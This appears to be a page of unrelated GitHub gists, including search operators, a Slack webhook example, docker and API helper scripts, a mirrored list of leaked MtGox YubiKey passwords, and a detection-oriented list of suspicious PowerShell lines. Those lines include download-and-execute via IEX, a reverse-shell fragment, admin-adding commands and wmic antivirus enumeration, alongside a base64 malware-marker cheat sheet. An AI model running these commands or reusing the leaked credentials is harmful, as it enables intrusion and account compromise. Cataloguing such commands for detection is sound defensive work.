Filter | Description | Example |
---|---|---|
allintext | Searches for occurrences of all the keywords given. | allintext:"keyword" |
intext | Searches for the occurrences of keywords all at once or one at a time. | intext:"keyword" |
inurl | Searches for a URL matching one of the keywords. | inurl:"keyword" |
allinurl | Searches for a URL matching all the keywords in the query. | allinurl:"keyword" |
intitle | Searches for occurrences of keywords in title all or one. | intitle:"keyword" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name | alpha2 | group | |
---|---|---|---|
Afghanistan | AF | RoW | |
Albania | AL | RoW | |
Algeria | DZ | RoW | |
American Samoa | AS | RoW | |
Andorra | AD | RoW | |
Angola | AO | RoW | |
Anguilla | AI | RoW | |
Antarctica | AQ | RoW | |
Antigua And Barbuda | AG | RoW |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -X POST \ | |
-H 'Content-type: application/json; charset=utf-8' \ | |
--data '{ "channel": "#mychannel", "username": "superbot", "icon_emoji": ":bot:", "text": "Foo" }' \ | |
https://hooks.slack.com/services/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
docker ps -q | xargs -n 1 docker inspect --format '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}} {{ .Name }}' | sed 's/ \// /' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
SOURCE_API_URL = "https://healthchecks.io/api/v1/checks/" | |
TARGET_API_URL = "http://0.0.0.0:8000/api/v1/checks/" | |
SOURCE_PROJECT_READONLY_KEY = "SOURCE_API_KEY_READONLY" | |
TARGET_PROJECT_KEY = "TARGET_API_KEY" | |
r = requests.get(SOURCE_API_URL, headers={"X-Api-Key": SOURCE_PROJECT_READONLY_KEY}) | |
for check in r.json()["checks"]: | |
print("Cloning %s" % check["name"]) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Mirror of: https://jenda.hrach.eu/f2/mtgox-yubikey.txt | |
# | |
# both slots worked for my 2012 yubikey, now has more worth than a paperweight but barely... ;-) | |
# | |
Yubikey Prefix Password | |
======= ====== ======== | |
123456A d2868706da69 32e193d3e932 | |
123456B cf0d9f4b8d2b d4deb686e7bc | |
720950A 24be0d14cc04 59e6fbe1f79f | |
720950B 82984359457f d7eeebf6d70d |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// suspicious PowerShell commands contacting URLs, adding admins, receiving commands | |
powershell -w 1 -exec bypass -e aQBlAH… --> "iex ((" | |
powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "... | |
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('. | |
powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")" | |
powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct | Select-Object UUID | |
powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber | |
powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber | |
C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Host Enumeration: | |
--- OS Specifics --- | |
wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
wmic computersystem LIST full | |
--- Anti-Virus --- | |
wmic /namespace:\\root\securitycenter2 path antivirusproduct |
Base64 Code | Mnemonic Aid | Decoded* | Description |
---|---|---|---|
JAB |
🗣 Jabber | $. |
Variable declaration (UTF-16) |
TVq |
📺 Television | MZ |
MZ header |
SUVY |
🚙 SUV | IEX |
PowerShell Invoke Expression |
SQBFAF |
🐣 Squab favorite | I.E. |
PowerShell Invoke Expression (UTF-16) |
SQBuAH |
🐣 Squab uahhh | I.n. |
PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz |
PAA |
💪 "Pah!" | <. |
Often used by Emotet (UTF-16) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"$schema": "https://aka.ms/terminal-profiles-schema", | |
"actions": | |
[ | |
{ | |
"command": | |
{ | |
"action": "copy", | |
"singleLine": false | |
}, |
NewerOlder